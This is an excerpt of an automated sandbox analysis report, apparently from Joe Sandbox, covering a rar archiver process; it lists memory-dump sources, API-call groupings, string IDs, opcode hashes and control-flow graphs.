                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,?,00007FF695CF4620,?,00000000,?,00007FF695D17A8C), ref: 00007FF695CF477A
                                                                                                                                                                                                                                                                    • FindNextFileW.KERNELBASE(?,?,00000000,?,?,00007FF695CF4620,?,00000000,?,00007FF695D17A8C), ref: 00007FF695CF47A4
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,?,00007FF695CF4620,?,00000000,?,00007FF695D17A8C), ref: 00007FF695CF47B2
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FileFind$ErrorFirstLast$Next
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 869497890-0
                                                                                                                                                                                                                                                                    • Opcode ID: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                                                                                                                                                                                                                                    • Instruction ID: 211c156fa662e028f481b3b29ff2b7922c5368bdfa2f817de7d0c2e45d9ca3d3
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B641A43260868196EA349B25E4802E863E0FB49BB4F405375EE7D877C5DF6CD959C700
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1815803762-0
                                                                                                                                                                                                                                                                    • Opcode ID: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                                                                                                                                                                                                                                    • Instruction ID: 52c25486b0fb47f605e6dab271c4b979dce5dbfed34f6346f12b90d1d830f5bf
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1401AD26B0864082E7209B12A84533D67A1EBC4FD0F088475DE4D87BA8CF7CDD8AC740
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Char
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 751630497-0
                                                                                                                                                                                                                                                                    • Opcode ID: 4a270d81eb8ab39873b6764aae3297a856c8880cd76c259fb5395090f733754a
                                                                                                                                                                                                                                                                    • Instruction ID: 3a79116998ecd8d64488a62f24b54dfd4fa812499a79e373d3b3926ed4e69198
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a270d81eb8ab39873b6764aae3297a856c8880cd76c259fb5395090f733754a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E227232A086829AE724DF30D4402FE77F0FB50B48F584176DA8DDA699DE78ED46CB50
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 9ab94304cbc9b67c99a8dfe8e518d31b2affcaf6fc96be297faa8bc65dcb09ce
                                                                                                                                                                                                                                                                    • Instruction ID: 5c07dff22dd6498c2cb945f9c954cf526e06eb3ba12dfa9e8ad39a38b7b6eb17
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ab94304cbc9b67c99a8dfe8e518d31b2affcaf6fc96be297faa8bc65dcb09ce
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E71C032A0568586D714DF29E8052ED33E1FB88F98F044239DF5DCB399DF78A8528794

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 635 7ff695d13ea8-7ff695d13f03 call 7ff695d2a5a0 call 7ff695d2c8a0 640 7ff695d13f40-7ff695d13f50 call 7ff695d1a9e8 635->640 641 7ff695d13f05-7ff695d13f3e GetModuleFileNameW call 7ff695d04e14 call 7ff695d1a9c0 635->641 645 7ff695d13f55-7ff695d13f79 call 7ff695cf1874 call 7ff695cf1e80 640->645 641->645 652 7ff695d13f7f-7ff695d13f89 645->652 653 7ff695d14692-7ff695d146c5 call 7ff695cf18ac call 7ff695d2a610 645->653 654 7ff695d13f8b-7ff695d13fac call 7ff695d111c0 * 2 652->654 655 7ff695d13fae-7ff695d13feb call 7ff695d2ec70 * 2 652->655 654->655 668 7ff695d13fef-7ff695d13ff3 655->668 669 7ff695d13ff9-7ff695d1402d call 7ff695cf2440 call 7ff695cf2150 668->669 670 7ff695d140f2-7ff695d14112 call 7ff695cf22e0 call 7ff695d2eb90 668->670 679 7ff695d140bc-7ff695d140e2 call 7ff695cf22e0 669->679 680 7ff695d14033 669->680 670->653 681 7ff695d14118-7ff695d14131 call 7ff695cf2150 670->681 679->668 690 7ff695d140e8-7ff695d140ec 679->690 682 7ff695d1403a-7ff695d1403e 680->682 693 7ff695d14138-7ff695d1414b call 7ff695d2eb90 681->693 694 7ff695d14133-7ff695d14136 681->694 685 7ff695d14040-7ff695d14044 682->685 686 7ff695d14064-7ff695d14069 682->686 685->686 689 7ff695d14046-7ff695d1405e call 7ff695d32290 685->689 691 7ff695d14097-7ff695d1409f 686->691 692 7ff695d1406b-7ff695d14070 686->692 707 7ff695d14060 689->707 708 7ff695d140a3-7ff695d140a7 689->708 690->653 690->670 699 7ff695d140b7 691->699 700 7ff695d140a1 691->700 692->691 698 7ff695d14072-7ff695d14078 692->698 693->653 706 7ff695d14151-7ff695d1416c call 7ff695d1d54c call 7ff695d2eb88 693->706 695 7ff695d1416f-7ff695d141b1 call 7ff695d1a900 call 7ff695d2eb90 694->695 718 7ff695d141c0-7ff695d141d5 695->718 719 7ff695d141b3-7ff695d141bb call 7ff695d2eb88 695->719 704 7ff695d1407a-7ff695d14091 call 7ff695d31700 698->704 705 7ff695d14093 698->705 699->679 700->682 704->705 716 7ff695d140a9-7ff695d140b5 704->716 705->691 706->695 707->686 708->699 716->679 720 7ff695d141db 718->720 721 7ff695d145f0-7ff695d14624 call 7ff695d13884 call 7ff695d2eb88 * 2 718->721 719->653 724 7ff695d141e1-7ff695d141ee 720->724 755 7ff695d14626-7ff695d14648 call 7ff695d111c0 * 2 721->755 756 7ff695d1464a-7ff695d14691 call 7ff695d2ec70 * 2 721->756 727 7ff695d14508-7ff695d14513 724->727 728 7ff695d141f4-7ff695d141fa 724->728 727->721 730 7ff695d14519-7ff695d14523 727->730 731 7ff695d14208-7ff695d1420e 728->731 732 7ff695d141fc-7ff695d14202 728->732 734 7ff695d14585-7ff695d14589 730->734 735 7ff695d14525-7ff695d1452b 730->735 736 7ff695d143d0-7ff695d143e0 call 7ff695d1a580 731->736 737 7ff695d14214-7ff695d1425c 731->737 732->727 732->731 744 7ff695d1458b-7ff695d1458f 734->744 745 7ff695d145a3-7ff695d145d4 call 7ff695d13884 734->745 740 7ff695d145db-7ff695d145de 735->740 741 7ff695d14531-7ff695d14539 735->741 761 7ff695d143e6-7ff695d14414 call 7ff695d1a9e8 call 7ff695d3172c 736->761 762 7ff695d144f0-7ff695d14503 736->762 742 7ff695d14261-7ff695d14264 737->742 740->721 751 7ff695d145e0-7ff695d145e5 740->751 749 7ff695d1453b-7ff695d1453e 741->749 750 7ff695d14573-7ff695d1457a 741->750 752 7ff695d14268-7ff695d14270 742->752 744->745 746 7ff695d14591-7ff695d14597 744->746 745->740 746->740 754 7ff695d14599-7ff695d145a1 746->754 758 7ff695d1456a-7ff695d14571 749->758 759 7ff695d14540-7ff695d14543 749->759 763 7ff695d1457e-7ff695d14583 750->763 751->724 752->752 760 7ff695d14272-7ff695d14288 call 7ff695d31700 752->760 754->740 755->756 756->653 758->763 765 7ff695d14561-7ff695d14568 759->765 766 7ff695d14545-7ff695d14548 759->766 779 7ff695d1428a-7ff695d14295 760->779 780 7ff695d142a3 760->780 761->762 788 7ff695d1441a-7ff695d144a9 call 7ff695d1d840 call 7ff695d1a900 call 7ff695d1a8c4 call 7ff695d1a900 call 7ff695d315fc 761->788 762->727 763->740 765->763 771 7ff695d14558-7ff695d1455f 766->771 772 7ff695d1454a-7ff695d1454d 766->772 771->763 772->746 777 7ff695d1454f-7ff695d14556 772->777 777->763 779->780 784 7ff695d14297-7ff695d142a1 779->784 786 7ff695d142a7-7ff695d142be 780->786 784->786 786->742 787 7ff695d142c0-7ff695d142c2 786->787 790 7ff695d142e6 787->790 791 7ff695d142c4-7ff695d142d6 call 7ff695d1a900 787->791 823 7ff695d144ab-7ff695d144bb 788->823 824 7ff695d144bf-7ff695d144cf 788->824 790->736 794 7ff695d142ec 790->794 796 7ff695d142db-7ff695d142e1 791->796 797 7ff695d142f1-7ff695d142f7 794->797 799 7ff695d145d6 796->799 800 7ff695d142f9-7ff695d142fe 797->800 801 7ff695d14300-7ff695d14303 797->801 799->740 800->801 803 7ff695d14305-7ff695d14314 800->803 801->797 805 7ff695d14316-7ff695d14320 803->805 806 7ff695d1433d-7ff695d14347 803->806 808 7ff695d14323-7ff695d14327 805->808 809 7ff695d145ea-7ff695d145ef call 7ff695d2a774 806->809 810 7ff695d1434d-7ff695d14378 call 7ff695d1d840 806->810 808->806 813 7ff695d14329-7ff695d1433b 808->813 809->721 818 7ff695d1437a-7ff695d14399 call 7ff695d31764 810->818 819 7ff695d1439e-7ff695d143cb call 7ff695d1470c 810->819 813->806 813->808 818->796 819->796 823->824 827 7ff695d144d2-7ff695d144d8 824->827 828 7ff695d144da-7ff695d144e5 827->828 829 7ff695d144eb-7ff695d144ee 827->829 828->799 828->829 829->827
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FileModuleNamesnprintfwcschr
                                                                                                                                                                                                                                                                    • String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS$\
                                                                                                                                                                                                                                                                    • API String ID: 602362809-1645646101
                                                                                                                                                                                                                                                                    • Opcode ID: ae8474dee3b463159ef0040d2370611761e4d5b9e5e790769e2fb30427c5b3fa
                                                                                                                                                                                                                                                                    • Instruction ID: 1562b311c95fec68519ed0abc17b000fafb0667cf968847a444a74257679be2b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae8474dee3b463159ef0040d2370611761e4d5b9e5e790769e2fb30427c5b3fa
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B222E222A1968285EB34DB15D4402F923E1FF45B84F806275EA4EC7AD9EF7CED49C348

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 1405 7ff695ce4fd0-7ff695ce502d call 7ff695d2a5a0 1408 7ff695ce502f-7ff695ce5037 1405->1408 1409 7ff695ce504d-7ff695ce5055 1405->1409 1408->1409 1410 7ff695ce5039-7ff695ce504b call 7ff695d2c8a0 1408->1410 1411 7ff695ce506e-7ff695ce5089 call 7ff695d0420c 1409->1411 1412 7ff695ce5057-7ff695ce5069 call 7ff695ce481c 1409->1412 1410->1409 1410->1412 1418 7ff695ce509f-7ff695ce50b6 call 7ff695d1db08 1411->1418 1419 7ff695ce508b-7ff695ce509d call 7ff695d1a9c0 1411->1419 1412->1411 1424 7ff695ce511b-7ff695ce5131 call 7ff695d2c8a0 1418->1424 1425 7ff695ce50b8-7ff695ce50c3 call 7ff695d1a59c 1418->1425 1419->1424 1430 7ff695ce5203-7ff695ce520d call 7ff695d1aa48 1424->1430 1431 7ff695ce5137-7ff695ce513e 1424->1431 1425->1424 1432 7ff695ce50c5-7ff695ce50cf call 7ff695cf3054 1425->1432 1440 7ff695ce5212-7ff695ce521c 1430->1440 1433 7ff695ce5140-7ff695ce5167 call 7ff695d03f98 1431->1433 1434 7ff695ce516c-7ff695ce51be call 7ff695d1aa1c call 7ff695d1aa48 call 7ff695d16e98 1431->1434 1432->1424 1441 7ff695ce50d1-7ff695ce5107 call 7ff695d1a9e8 call 7ff695d1a9c0 call 7ff695cf3054 1432->1441 1433->1434 1488 7ff695ce51d3-7ff695ce51e8 call 7ff695d17a24 1434->1488 1443 7ff695ce5222 1440->1443 1444 7ff695ce52db-7ff695ce52e0 1440->1444 1441->1424 1529 7ff695ce5109-7ff695ce5116 call 7ff695d1a9e8 1441->1529 1449 7ff695ce532f-7ff695ce5332 1443->1449 1450 7ff695ce5228-7ff695ce522d 1443->1450 1445 7ff695ce5453-7ff695ce5477 call 7ff695cef00c call 7ff695cef230 call 7ff695cef09c 1444->1445 1446 7ff695ce52e6-7ff695ce52e9 1444->1446 1506 7ff695ce547c-7ff695ce5483 1445->1506 1454 7ff695ce52ef-7ff695ce52f2 1446->1454 1455 7ff695ce5379-7ff695ce5382 1446->1455 1452 7ff695ce5334 1449->1452 1453 7ff695ce533b-7ff695ce533e 1449->1453 1450->1449 1458 7ff695ce5233-7ff695ce5236 1450->1458 1452->1453 1462 7ff695ce5340 1453->1462 1463 7ff695ce5347-7ff695ce5358 call 7ff695cd1230 call 7ff695cd4858 1453->1463 1464 7ff695ce52f4-7ff695ce52f7 1454->1464 1465 7ff695ce536c-7ff695ce5374 call 7ff695d181cc 1454->1465 1460 7ff695ce5449-7ff695ce5451 call 7ff695d0eab8 1455->1460 1461 7ff695ce5388-7ff695ce538b 1455->1461 1468 7ff695ce5290-7ff695ce5299 1458->1468 1469 7ff695ce5238-7ff695ce523b 1458->1469 1460->1506 1473 7ff695ce5391-7ff695ce5397 1461->1473 1474 7ff695ce541b-7ff695ce5433 call 7ff695d1ab1c 1461->1474 1462->1463 1521 7ff695ce535d 1463->1521 1464->1445 1476 7ff695ce52fd-7ff695ce5300 1464->1476 1465->1506 1478 7ff695ce52b2-7ff695ce52bd 1468->1478 1479 7ff695ce529b-7ff695ce529e 1468->1479 1481 7ff695ce5274-7ff695ce528b call 7ff695cd1230 call 7ff695cd48ec 1469->1481 1482 7ff695ce523d-7ff695ce5240 1469->1482 1493 7ff695ce540c-7ff695ce5419 call 7ff695d054f8 call 7ff695d051e4 1473->1493 1494 7ff695ce5399-7ff695ce539c 1473->1494 1474->1506 1520 7ff695ce5435-7ff695ce5447 call 7ff695d0bbd4 1474->1520 1476->1449 1495 7ff695ce5302-7ff695ce5305 1476->1495 1486 7ff695ce52ce-7ff695ce52d6 call 7ff695d055e0 1478->1486 1490 7ff695ce52bf-7ff695ce52c9 call 7ff695d1a9e8 1478->1490 1479->1486 1487 7ff695ce52a0-7ff695ce52a6 1479->1487 1539 7ff695ce535e-7ff695ce5362 call 7ff695cd14fc 1481->1539 1482->1445 1497 7ff695ce5246-7ff695ce5249 1482->1497 1486->1506 1503 7ff695ce5313-7ff695ce531d call 7ff695ce481c 1487->1503 1504 7ff695ce52a8-7ff695ce52ad call 7ff695ce7214 1487->1504 1541 7ff695ce51c0-7ff695ce51ce call 7ff695d1aa48 1488->1541 1542 7ff695ce51ea-7ff695ce5201 call 7ff695d16f68 call 7ff695cd14c0 1488->1542 1490->1486 1493->1506 1510 7ff695ce53ef-7ff695ce5401 call 7ff695ce45c8 1494->1510 1511 7ff695ce539e-7ff695ce53a1 1494->1511 1512 7ff695ce5322-7ff695ce532a call 7ff695cf67e0 1495->1512 1513 7ff695ce5307-7ff695ce530a 1495->1513 1497->1449 1498 7ff695ce524f-7ff695ce5252 1497->1498 1498->1445 1515 7ff695ce5258-7ff695ce525b 1498->1515 1503->1506 1504->1506 1526 7ff695ce5485-7ff695ce548c call 7ff695ce8444 1506->1526 1527 7ff695ce5491-7ff695ce54bc call 7ff695d2a610 1506->1527 1510->1493 1511->1503 1525 7ff695ce53a7-7ff695ce53d5 call 7ff695ce45c8 call 7ff695d1ab1c 1511->1525 1512->1506 1513->1445 1528 7ff695ce5310 1513->1528 1532 7ff695ce526b-7ff695ce5272 1515->1532 1533 7ff695ce525d-7ff695ce5260 1515->1533 1520->1506 1521->1539 1525->1506 1561 7ff695ce53db-7ff695ce53ea call 7ff695d0ba9c 1525->1561 1526->1527 1528->1503 1529->1424 1532->1486 1533->1512 1547 7ff695ce5266 1533->1547 1555 7ff695ce5367 1539->1555 1541->1488 1542->1440 1547->1528 1555->1506 1561->1506
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: wcschr
                                                                                                                                                                                                                                                                    • String ID: .part$.rar$.rar$AFUMD$FUADPXETK$stdin
                                                                                                                                                                                                                                                                    • API String ID: 1497570035-1281034975
                                                                                                                                                                                                                                                                    • Opcode ID: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                                                                                                                                                                                                                                    • Instruction ID: c64bd03e62480eeaee42b805859bd7f98b599e071dc755959bceef3ef4306010
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A7C1A763A1C682D4EA35AF2499521FC13E1EF46F84F4451B9DA4ECA6DADE2CFD09C300

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
